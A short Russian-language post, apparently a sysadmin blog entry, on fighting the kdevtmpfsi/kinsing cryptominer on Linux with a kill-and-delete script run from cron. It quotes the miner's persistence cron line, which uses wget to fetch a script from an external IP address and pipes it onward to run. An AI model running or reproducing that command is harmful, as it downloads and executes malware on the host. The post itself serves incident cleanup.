0
26.05.2022
10:58
26.05.2022 10:58:45
kdevtmpfsi - это вирус майнер, работает на операционных системах семейства Linux
В работе вирус загружает CPU на 100%
Сразу оговорюсь, описанный ниже способ не решает проблему в корне, но по крайней мере не дает вирусу работать, т.к. пути проникновения вируса на текущий момент не известны.
Я пробовал удалять файл /tmp/kdevtmpfsi, создавать такой же файл, и назначать права chmod 0000, не помогает, вирус создает новые файлы добавляя к названию цифры вида /tmp/kdevtmpfsi65896556.
Пробовал определять порты через которые работает вирус и закрывать их, тоже не помогает, вирус начинает использовать другие порты.
Обнаружил в cron запись вида:
* * * * * wget -q -O - http://195.3.146.118/lr.sh
|
Удалил, но это тоже не помогло, видимо он запускается еще от куда-то.
Создаем новый файл в nano
Вставляем скрипт
#!/bin/bash
kill $(pgrep kdevtmp)
kill $(pgrep kinsing)
find / -iname kdevtmpfsi -exec rm -fv {} \;
find / -iname kinsing -exec rm -fv {} \;
rm /tmp/kdevtmp*
rm /tmp/kinsing*
|
Этот скрипт находит вирус kdevtmpfsi, завершает процессы и удаляет его файлы.
Если запустить этот скрипт один раз вирус конечно удалиться, но через какое-то время он снова вернется, может быть через пару секунд, а может и через несколько часов.
Поэтому добавляем в cron постоянный запуск этого скрипта:
Добавляем строчку:
* * * * * sh {путь_к_файлу_скрипта}kill.sh > /var/log/kill.log
|